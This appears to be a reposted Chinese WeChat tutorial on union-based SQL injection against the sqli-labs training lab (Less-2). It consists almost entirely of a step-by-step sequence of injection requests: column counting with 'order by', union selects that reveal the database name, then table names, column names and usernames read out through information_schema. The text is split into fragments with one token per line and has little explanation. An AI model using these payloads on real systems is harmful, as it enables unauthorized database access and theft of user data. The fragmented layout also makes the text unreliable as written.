SELECT
username, email
FROM
users
WHERE
username =
'可控制内容'
;
GET
/sqli/Less-2/?id=1+order+by+3
HTTP/1.1
GET
/sqli/Less-2/?id=-1+union+select+1,2,3
HTTP/1.1
GET
/sqli/Less-2/?id=-1+union+select+1,database(),3
HTTP/1.1
GET /sqli/Less-2/?id=-1+union+
select
+
1
,(
select
+table_name+
from
+information_schema.tables+
where
+table_schema=
'security'
+
limit
+
0
,
1
),
3
HTTP
/
1.1
GET /sqli/Less-2/?id=-1+union+
select
+
1
,(
select
+column_name+
from
+information_schema.columns+
where
+table_schema=
'security'
+
and
+table_name=
'users'
+
limit
+
0
,
1
),
3
HTTP
/
1.1
GET /sqli/Less-2/?id=-1+union+
select
+
1
,(
select
+username+
from
+security.users+
limit
+
0
,
1
),
3
HTTP
/
1.1
原文始发于微信公众号(Web安全工具库):SQL注入 -- Union联合注入漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论